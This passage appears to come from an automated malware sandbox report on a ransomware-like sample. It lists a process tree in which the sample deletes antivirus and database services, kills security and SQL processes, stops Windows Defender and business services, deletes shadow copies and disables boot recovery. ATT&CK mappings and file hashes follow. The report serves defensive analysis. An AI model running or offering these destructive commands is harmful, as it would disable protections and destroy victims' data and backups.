    3⤵
    PID:4656
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL$WOLTERSKLUWER"
    3⤵
    - Launches sc.exe
    PID:2276
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent$PROGID"
    3⤵
    PID:748
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent$WOLTERSKLUWER"
    3⤵
    PID:3516
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLFDLauncher$OPTIMA"
    3⤵
    PID:4284
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL$OPTIMA"
    3⤵
    PID:216
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent$OPTIMA"
    3⤵
    - Launches sc.exe
    PID:4988
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ReportServer$OPTIMA"
    3⤵
    PID:3824
- - C:\Windows\SysWOW64\sc.exe
    sc delete "msftesql$SQLEXPRESS"
    3⤵
    - Launches sc.exe
    PID:1472
- - C:\Windows\SysWOW64\sc.exe
    sc delete "postgresql-x64-9.4"
    3⤵
    - Launches sc.exe
    PID:2284
- - C:\Windows\SysWOW64\sc.exe
    sc delete "WRSVC"
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ekrn"
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ekrnEpsw"
    3⤵
    PID:4944
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klim6"
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\sc.exe
    sc delete "AVP18.0.0"
    3⤵
    PID:1336
- - C:\Windows\SysWOW64\sc.exe
    sc delete "KLIF"
    3⤵
    - Launches sc.exe
    PID:4296
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klpd"
    3⤵
    PID:1448
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klflt"
    3⤵
    PID:64
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klbackupdisk"
    3⤵
    PID:4244
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klbackupflt"
    3⤵
    PID:4436
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klkbdflt"
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klmouflt"
    3⤵
    - Launches sc.exe
    PID:4544
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klhk"
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\sc.exe
    sc delete "KSDE1.0.0"
    3⤵
    PID:2144
- - C:\Windows\SysWOW64\sc.exe
    sc delete "kltap"
    3⤵
    PID:3148
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ScSecSvc"
    3⤵
    PID:4876
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Core Mail Protection"
    3⤵
    PID:3756
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Core Scanning Server"
    3⤵
    PID:1116
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Core Scanning ServerEx"
    3⤵
    PID:3816
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Online Protection System"
    3⤵
    - Launches sc.exe
    PID:4508
- - C:\Windows\SysWOW64\sc.exe
    sc delete "RepairService"
    3⤵
    PID:2876
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Core Browsing Protection"
    3⤵
    PID:3016
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Quick Update Service"
    3⤵
    PID:2456
- - C:\Windows\SysWOW64\sc.exe
    sc delete "McAfeeFramework"
    3⤵
    - Launches sc.exe
    PID:3092
- - C:\Windows\SysWOW64\sc.exe
    sc delete "macmnsvc"
    3⤵
    PID:220
- - C:\Windows\SysWOW64\sc.exe
    sc delete "masvc"
    3⤵
    - Launches sc.exe
    PID:1472
- - C:\Windows\SysWOW64\sc.exe
    sc delete "mfemms"
    3⤵
    PID:4656
- - C:\Windows\SysWOW64\sc.exe
    sc delete "mfevtp"
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmFilter"
    3⤵
    - Launches sc.exe
    PID:4520
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TMLWCSService"
    3⤵
    - Launches sc.exe
    PID:2712
- - C:\Windows\SysWOW64\sc.exe
    sc delete "tmusa"
    3⤵
    PID:4180
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmPreFilter"
    3⤵
    PID:1784
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TMSmartRelayService"
    3⤵
    - Launches sc.exe
    PID:1116
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TMiCRCScanService"
    3⤵
    PID:2456
- - C:\Windows\SysWOW64\sc.exe
    sc delete "VSApiNt"
    3⤵
    - Launches sc.exe
    PID:3360
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmCCSF"
    3⤵
    PID:2276
- - C:\Windows\SysWOW64\sc.exe
    sc delete "tmlisten"
    3⤵
    PID:2380
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmProxy"
    3⤵
    PID:1324
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ntrtscan"
    3⤵
    - Launches sc.exe
    PID:32
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ofcservice"
    3⤵
    PID:4440
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmPfw"
    3⤵
    PID:3476
- - C:\Windows\SysWOW64\sc.exe
    sc delete "PccNTUpd"
    3⤵
    - Launches sc.exe
    PID:4448
- - C:\Windows\SysWOW64\sc.exe
    sc delete "PandaAetherAgent"
    3⤵
    PID:3356
- - C:\Windows\SysWOW64\sc.exe
    sc delete "PSUAService"
    3⤵
    PID:4440
- - C:\Windows\SysWOW64\sc.exe
    sc delete "NanoServiceMain"
    3⤵
    PID:5036
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPIntegrationService"
    3⤵
    PID:4784
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPProtectedService"
    3⤵
    PID:4008
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPRedline"
    3⤵
    PID:4436
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPSecurityService"
    3⤵
    PID:316
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPUpdateService"
    3⤵
    - Launches sc.exe
    PID:2352
- - C:\Windows\SysWOW64\sc.exe
    sc delete "UniFi"
    3⤵
    PID:3392
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im PccNTMon.exe
    3⤵
    - Kills process with taskkill
    PID:2752
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im NTRtScan.exe
    3⤵
    - Kills process with taskkill
    PID:316
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TmListen.exe
    3⤵
    - Kills process with taskkill
    PID:2692
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TmCCSF.exe
    3⤵
    - Kills process with taskkill
    PID:3092
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TmProxy.exe
    3⤵
    - Kills process with taskkill
    PID:2696
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TMBMSRV.exe
    3⤵
    - Kills process with taskkill
    PID:3004
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TMBMSRV.exe
    3⤵
    - Kills process with taskkill
    PID:1656
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TmPfw.exe
    3⤵
    - Kills process with taskkill
    PID:4832
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im CNTAoSMgr.exe
    3⤵
    - Kills process with taskkill
    PID:2276
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlbrowser.exe
    3⤵
    - Kills process with taskkill
    PID:3964
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlwriter.exe
    3⤵
    - Kills process with taskkill
    PID:3436
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlservr.exe
    3⤵
    - Kills process with taskkill
    PID:2864
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im msmdsrv.exe
    3⤵
    - Kills process with taskkill
    PID:4028
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im MsDtsSrvr.exe
    3⤵
    - Kills process with taskkill
    PID:3824
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlceip.exe
    3⤵
    - Kills process with taskkill
    PID:996
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im fdlauncher.exe
    3⤵
    - Kills process with taskkill
    PID:2876
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im Ssms.exe
    3⤵
    - Kills process with taskkill
    PID:520
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im SQLAGENT.EXE
    3⤵
    - Kills process with taskkill
    PID:2380
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im fdhost.exe
    3⤵
    - Kills process with taskkill
    PID:4772
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im fdlauncher.exe
    3⤵
    - Kills process with taskkill
    PID:316
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlservr.exe
    3⤵
    - Kills process with taskkill
    PID:1392
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im ReportingServicesService.exe
    3⤵
    - Kills process with taskkill
    PID:2952
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im msftesql.exe
    3⤵
    - Kills process with taskkill
    PID:4180
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im pg_ctl.exe
    3⤵
    - Kills process with taskkill
    PID:3400
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im postgres.exe
    3⤵
    - Kills process with taskkill
    PID:3468
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLServerADHelper100
    3⤵
    PID:3820
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper100
      4⤵
      PID:3088
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$ISARS
    3⤵
    PID:3792
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$ISARS
      4⤵
      PID:2884
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$MSFW
    3⤵
    PID:1100
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$MSFW
      4⤵
      PID:2668
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$ISARS
    3⤵
    PID:3964
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$ISARS
      4⤵
      PID:1348
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$MSFW
    3⤵
    PID:1556
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$MSFW
      4⤵
      PID:3080
- - C:\Windows\SysWOW64\net.exe
    net stop SQLBrowser
    3⤵
    PID:3792
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLBrowser
      4⤵
      PID:1944
- - C:\Windows\SysWOW64\net.exe
    net stop ReportServer$ISARS
    3⤵
    PID:3764
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$ISARS
      4⤵
      PID:3936
- - C:\Windows\SysWOW64\net.exe
    net stop SQLWriter
    3⤵
    PID:3976
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLWriter
      4⤵
      PID:3848
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:4392
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:996
- - C:\Windows\SysWOW64\net.exe
    net stop mr2kserv
    3⤵
    PID:2216
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mr2kserv
      4⤵
      PID:1020
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeADTopology
    3⤵
    PID:1448
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeADTopology
      4⤵
      PID:2396
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeFBA
    3⤵
    PID:3900
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeFBA
      4⤵
      PID:1920
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeIS
    3⤵
    PID:2660
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeIS
      4⤵
      PID:2664
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeSA
    3⤵
    PID:3332
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSA
      4⤵
      PID:2380
- - C:\Windows\SysWOW64\net.exe
    net stop ShadowProtectSvc
    3⤵
    PID:4916
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ShadowProtectSvc
      4⤵
      PID:4772
- - C:\Windows\SysWOW64\net.exe
    net stop SPAdminV4
    3⤵
    PID:4448
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPAdminV4
      4⤵
      PID:4840
- - C:\Windows\SysWOW64\net.exe
    net stop SPTimerV4
    3⤵
    PID:2984
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPTimerV4
      4⤵
      PID:4436
- - C:\Windows\SysWOW64\net.exe
    net stop SPTraceV4
    3⤵
    PID:4596
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPTraceV4
      4⤵
      PID:2532
- - C:\Windows\SysWOW64\net.exe
    net stop SPUserCodeV4
    3⤵
    PID:2884
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPUserCodeV4
      4⤵
      PID:2876
- - C:\Windows\SysWOW64\net.exe
    net stop SPWriterV4
    3⤵
    PID:2284
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPWriterV4
      4⤵
      PID:3648
- - C:\Windows\SysWOW64\net.exe
    net stop SPSearch4
    3⤵
    PID:1952
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPSearch4
      4⤵
      PID:2664
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLServerADHelper100
    3⤵
    PID:3084
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper100
      4⤵
      PID:4180
- - C:\Windows\SysWOW64\net.exe
    net stop IISADMIN
    3⤵
    PID:2004
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop IISADMIN
      4⤵
      PID:1784
- - C:\Windows\SysWOW64\net.exe
    net stop firebirdguardiandefaultinstance
    3⤵
    PID:232
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop firebirdguardiandefaultinstance
      4⤵
      PID:2692
- - C:\Windows\SysWOW64\net.exe
    net stop ibmiasrw
    3⤵
    PID:2132
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ibmiasrw
      4⤵
      PID:4880
- - C:\Windows\SysWOW64\net.exe
    net stop QBCFMonitorService
    3⤵
    PID:32
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBCFMonitorService
      4⤵
      PID:1472
- - C:\Windows\SysWOW64\net.exe
    net stop QBVSS
    3⤵
    PID:3356
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBVSS
      4⤵
      PID:524
- - C:\Windows\SysWOW64\net.exe
    net stop QBPOSDBServiceV12
    3⤵
    PID:2660
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBPOSDBServiceV12
      4⤵
      PID:316
- - C:\Windows\SysWOW64\net.exe
    net stop "IBM Domino Server (CProgramFilesIBMDominodata)"
    3⤵
    PID:1392
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "IBM Domino Server (CProgramFilesIBMDominodata)"
      4⤵
      PID:3520
- - C:\Windows\SysWOW64\net.exe
    net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
    3⤵
    PID:2660
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
      4⤵
      PID:4080
- - C:\Windows\SysWOW64\net.exe
    net stop IISADMIN
    3⤵
    PID:4444
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop IISADMIN
      4⤵
      PID:3848
- - C:\Windows\SysWOW64\net.exe
    net stop "Simply Accounting Database Connection Manager"
    3⤵
    PID:4044
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "Simply Accounting Database Connection Manager"
      4⤵
      PID:2824
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB1
    3⤵
    PID:2756
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB1
      4⤵
      PID:3968
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB2
    3⤵
    PID:3348
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB2
      4⤵
      PID:4520
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB3
    3⤵
    PID:2692
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB3
      4⤵
      PID:5072
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB4
    3⤵
    PID:2104
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB4
      4⤵
      PID:1808
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB5
    3⤵
    PID:1528
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB5
      4⤵
      PID:3356
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq MsMpEng.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:1848
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:2316
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:2104
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq ntrtscan.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:4380
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq avp.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:1144
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq WRSA.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:972
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:1580
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq egui.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:2676
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:2396
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq AvastUI.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:2532
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:3436
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
  2⤵
  PID:2688
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  PID:4144
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
  2⤵
  PID:4692
- C:\Windows\SysWOW64\notepad.exe
  notepad.exe
  2⤵
  PID:3868

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:908

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv /h3pJ7I+aUmaoAbcbQhizg.0.2
1⤵
PID:2216

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
1⤵
PID:3904

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons_retina_thumb.png

Filesize
64KB

MD5
1b0c18e02cab491031a2d4387249654c

SHA1
8ef0af0c18721f8d51dbf30db593d20a13de5786

SHA256
59971e3aa2b263363c890cb10a867ea147989b2c6ee15e5c88499c23330d28c7

SHA512
63c5a3e7c0c5b10cc831c7aa7bffd4576484c0da9c66d80615d17ffe677712b0067ec673450603f9a2f73f952e7a8a3c049495073dc92ef3dd292dafe8f1ecf8

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons_retina_thumb.png

Filesize
52KB

MD5
0c4da32f8d5d596f9d4e477353261c1c

SHA1
9a2101d5e031f8acb22ebc4a33af5b8c5be29bea

SHA256
13bae6e2ce74cf8942afe26258e14b440625c7d312e6fa86df5bb7a35291e25d

SHA512
753686921c8e40e6e8d0b9299524cc406515347b26dca71e1b03076da59af8bb44f63289d9f2ca3b04dd86a56a14381bce7bbd4c9eac7a38d45ff2fdafe5790d

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-il\ui-strings.js

Filesize
29KB

MD5
acca6855da1d1ab235d4437446f5f439

SHA1
5f1969db05cd7b00db51accd50929bd6b22d5949

SHA256
f278bf7e3c722dacf9ba4dcd6c9397d656cc27336f20bedab283464dc92e3b0e

SHA512
ce7513213ec7d9e54f45a549597cb2ee793849751890ddccee3d7fc3f0beb03e2e74e779420533d7011716a5d1a829bcfdcf280d0c343754f8e409b0b9cc0d30

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-ma\ui-strings.js.1F5-33B-521

Filesize
34KB

MD5
405ec42e65cf6069873835553e0573d3

SHA1
079f97134da055dca27afe8baa80da89f06741fd

SHA256
9997aa23c663595cae92720610171db6ca40dea6e7c4fa9ac730f154af60f95f

SHA512
2bdc64a50ad4c33ae46def9040201a4cf35c2cff0e71d012970c81ed2b29fed5e0fc8516533f8334650584097bda754dea93ffafe63a073e1aff497287d364ec

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\ui-strings.js

Filesize
9KB

MD5
9e277979fb3f31c4aacc306d3ab357c8

SHA1
46bbeea2e2db8d191089e8e2a7af9663ff0f4ca4

SHA256
af0693caeee6a4bb9f7a2491e82557de413d79c110f2b8df14490a13278f1288

SHA512
db09af43260c7da8c2fbd816a7e8e4ec9d3c431987c4e65549e43a0bdd1c552242cb8dd09db9771cbfe9d647bd67e0e64cd00539ff13455adb1d829501caec37

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\ui-strings.js

Filesize
5KB

MD5
4dd1830ba4ccf32db8174d40babdd439

SHA1
a6a7176e1fdca66a110f96fc9ffb253c992684eb

SHA256
37d30b1a16bd1d2c55d250ca7bc197391639ecb26316d31b5443fb4103b3a13f

SHA512
0cff9ef9f7ff7d254319355d2df95106428d6cba43b76e71b202b025604bc66520ce524f7cea6a4fc0d2e4ba6d4b522662bae541adff32bcb51dff67fb6262f9

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\exportpdf-selector.js

Filesize
175KB

MD5
b8b447aa58f1f302e5982f20cd914311

SHA1
1198986dab95a17dd33c43e5594df1f046ce0124

SHA256
007046afd1a5ffe0d09456527c9b61bac761335157dea9d99d301dcd26aa1f7d

SHA512
e130deefc1fefde888b8169f4cba4e45ab636ed7563af53b208401ce8f96bdce840f0c6c0173345b8b1513edbc73451eafc4af2c59414039c7458f753b14cc73

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-il\ui-strings.js

Filesize
10KB

MD5
74e44c46d277f502ef689478eff30857

SHA1
7eda191c67788aa6b2185f32e80efefcb5a5552d

SHA256
ffcd50b33a361c710a87c8460624d23d2677d702fde7a7080bfc212e636c7533

SHA512
a28fd3640ba931f3f0a7e8cd50fda0970da7fea7edb0e4dd8f59ed7715d82dc690e3d26e4bb1a5cbc47f92b12d0e3415fbc607bb818a7e062c3ee0cf4d867264

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-ma\ui-strings.js

Filesize
12KB

MD5
698eeda2224a1c958238bf19279e08b7

SHA1
548af83bb70a50bebc7518a8c03265e7e3f9e4ad

SHA256
f57849380436fb56a14031911d97a35118d788d3d0eb2c8d6b7a0caa9ea3f5a3

SHA512
892bf48b6d590c46ec5c5b7c87cf5716f0547e917923bae8d27b899a31923c2b552c07c898502f124ebc7a55b567e5120248f92b1e154af17f5543387744d05b

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\new_icons_retina.png

Filesize
18KB

MD5
2a90e81d368f74d06fb36c63dd60cce7

SHA1
162811701f5a372eba6ec4da02d09d5e9ba3496e

SHA256
2171d39a7aa07b157a97e41980d399495e0d63e48d46977839ab0b2378986485

SHA512
b934e574f5c89d3069dc01d421f43ff22b019fff4a38f50629b9523b0a1579a0cc280a163a5d59f5c848ea23174a08f55b5305132440785b2cf7f8b73f7bdde5

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\illustrations.png

Filesize
10KB

MD5
72ec03bd6d19f0eb6b4aeae95b9fb9fd

SHA1
90f7093d2b16c4aad0b63d37afee715c3877a5f6

SHA256
81450a4ec216b6db65a43cbb2cf6bfe32e5a7d43a138a1b81396e5a0acb8661e

SHA512
814ba07b77f7de3c0e967e4d19523aced1c16a3d6d439670705db083ba1738a818e0709fdc75a7528a5fdb55b7542bae08e65cef34a6e69072773cab0c4bb07d

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-il\ui-strings.js

Filesize
6KB

MD5
841e39dd8a516beb155ca25686babe38

SHA1
24222b41fef28758695dae4c93692fe13dc7bf21

SHA256
34934758b46e3b0f36f056c4016b0a1ec051c322a75c553b7fba7c5123e00302

SHA512
cda9d27f896359faf5f0c48c80b93570b9e30a1319817c625b8e7a44c55c6a68c059f2fcfbc228e82be16d771f88c30be09a268fa5174cb6758853e4ca6315ac

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf

Filesize
56KB

MD5
b483ce3233c90077df210be0291543a8

SHA1
08424f99764ff3f358e63313af2d5500a8625a7d

SHA256
1fe8d32ba82fef3d3acbba77c181a873cc38fbd7eb0b5d44352591f2065515f3

SHA512
2c597c3b5ef76d984ec8ca963daf0f46766f5335d14f1c7d35656d65154a9e660f3fbdddf7001257aab52eb5dcd94d394ac6710ce54c9d2fe22d8a2daaa6e1d7

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-variant2-2x.gif

Filesize
813KB

MD5
21b6eece4f7301cc11c93fc14d69c5b5

SHA1
624fab176529216ba19c980e5b6f6f151de560d9

SHA256
2c8b8a41b7b11529378e47b7d4e9c41c27aab12f12522d74ba7c79eb9f3bc959

SHA512
fd5b5190f99d29d4d1ab0e5e8bca7b8eda0e5704f3adfb527cb98e91f673bb51676847cef6c358c941dcdb3eca38523c9477903c4888d1d1ee9eac430a89061c

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-ma\ui-strings.js

Filesize
17KB

MD5
183649134aa0b3c4576b52e58d0fd2f4

SHA1
31385e143fa156ad933ff10c29c5e83cd3c90ea2

SHA256
1ee1df05ebeef4cec39b90e7a9bab4a091146976ad0d62aabcf37054d09b61e0

SHA512
36ea75d35d17581c9b63d48f4725437ca74e8d27321d8af73df41b835efa88d59ed237ab8d1cb3a810ecae9d484d6a71ec569b67c33e6e67417213bca51ce612

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-il\ui-strings.js

Filesize
15KB

MD5
818548b237f9c5d89ffa434cc0ac3fbf

SHA1
70e7255466484cd5f7a9b07c7ce23020897a9b77

SHA256
ee6618f96a84d3d157486cc969586d665540f4499d7025b46f91cbfc5a785b2b

SHA512
